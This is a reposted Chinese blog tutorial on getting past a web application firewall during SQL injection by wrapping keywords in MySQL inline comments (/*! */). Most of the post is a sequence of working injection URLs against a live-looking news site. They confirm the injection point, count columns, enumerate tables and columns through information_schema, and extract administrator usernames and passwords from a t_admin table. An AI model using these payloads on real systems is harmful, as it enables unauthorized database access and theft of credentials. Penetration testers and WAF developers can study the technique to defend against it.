搜文章
推荐 原创 视频 Java开发 iOS开发 前端开发 JavaScript开发 Android开发 PHP开发 数据库 开发工具 Python开发 Kotlin开发 Ruby开发 .NET开发 服务器运维 开放平台 架构师 大数据 云计算 人工智能 开发语言 其它开发
Lambda在线 > 黑白之道 > bypass waf入门之sql注入 [ 内联注释篇 ]

bypass waf入门之sql注入 [ 内联注释篇 ]

黑白之道 2019-04-05


0x01 前言


昨天在搞一个目标的旁站时凑巧又碰到了waf,当然啦,这个waf比较弱,基本是弱到没朋友的那种,但为了博客的完整性,这里还是顺便就记录一下,留给有需要的朋友,方法非常简单,关于bypass waf的东西其实特别多,这里暂时只提一种,”内联注释”,招数早已经烂大街了,后续再遇到其它的bypass实例,也会继续更新到博客上,废话少说,看实例吧:


0x02 依旧是先判断注入点是否存在,很显然,’and’没有拦


http://www.target.com/news/show1.php?id=1102 And 1212=1212  返回正常

http://www.target.com/news/show1.php?id=1102 And 1212=121   返回异常,注入存在


bypass waf入门之sql注入 [ 内联注释篇 ]



bypass waf入门之sql注入 [ 内联注释篇 ]


0x03 我们观察到,当字段个数为11的时候页面返回正常,说明当前表字段个数为11个,’order by’ 也没有拦,到这里为止,凭着一点经验自己心里就有种感觉,这个waf肯定非常好过,接着往下看吧


http://www.target.com/news/show1.php?id=1102 OrDer by 11


bypass waf入门之sql注入 [ 内联注释篇 ]



0x04 开始搜集信息,这时我们发现waf似乎开始起作用了,拦了我们的内置函数


http://www.target.com/news/show1.php?id=1102 And 1=12 +UNION+ALL+SELECT+1,2,user(),version(),database(),6,7,8,9,10,11 --+-


bypass waf入门之sql注入 [ 内联注释篇 ]


0x05 既然拦了函数,咱们就把函数给注释一下看看,然后就这么容易的通过了[以为还要折腾很久],好吧,既然它对这种内联注释感冒,那后面我就把所有的关键字都用这种方式包起来,省的我一个个猜它到底拦哪个


http://www.target.com/news/show1.php?id=1102 And 1=12 +UNION+ALL+SELECT+1,2,/*!user()*/,version(),database(),6,7,8,9,10,11 --+-


bypass waf入门之sql注入 [ 内联注释篇 ]


0x06 查询当前库中的所有表,这类我们看到了’t_admin’这张管理表


http://www.target.com/news/show1.php?id=1102 aNd 1=12 +/*!UNION+ALL+SELECT*/+1,2,/*!group_concat(table_name)*/,/*!version()*/,/*!database()*/,6,7,8,9,10,11 from /*!information_schema.tables*/ /*!where*/ /*!table_schema*/=0x686e797075686b315f7363686f6f6c --+-


bypass waf入门之sql注入 [ 内联注释篇 ]


0x07 查询’t_admin’表中的所有字段名,如下


http://www.target.com/news/show1.php?id=1102 ANd 1=12 +/*!UNION+ALL+SELECT*/+1,2,/*!group_concat(column_name)*/,/*!version()*/,/*!database()*/,6,7,8,9,10,11 from /*!information_schema.columns*/ /*!where*/ /*!table_name*/=0x745f61646d696e --+-


bypass waf入门之sql注入 [ 内联注释篇 ]

0x08 就剩最后一步了,查出管理员的账号密码即可


http://www.target.com/news/show1.php?id=1102 anD 1=12 +/*!UNION+ALL+SELECT*/+1,2,/*!admin_name*/,/*!admin_password*/,5,6,7,8,9,10,11 from /*!t_admin*/ /*!limit*/ 0,1--+-


bypass waf入门之sql注入 [ 内联注释篇 ]


小结:


没啥实际的技术含量,只是为了博客完整性稍作记录而已,关于bypass waf后续还会有很多的篇幅来说明,待续…


原文链接:https://klionsec.github.io/2016/05/20/bypass-waf-note/

文章来源:klion's blog

版权声明:本站内容全部来自于腾讯微信公众号,属第三方自助推荐收录。《bypass waf入门之sql注入 [ 内联注释篇 ]》的版权归原作者「黑白之道」所有,文章言论观点不代表Lambda在线的观点, Lambda在线不承担任何法律责任。如需删除可联系QQ:516101458

文章来源: 阅读原文

相关阅读

关注黑白之道微信公众号

黑白之道微信公众号:i77169

黑白之道

手机扫描上方二维码即可关注黑白之道微信公众号

黑白之道最新文章

精品公众号随机推荐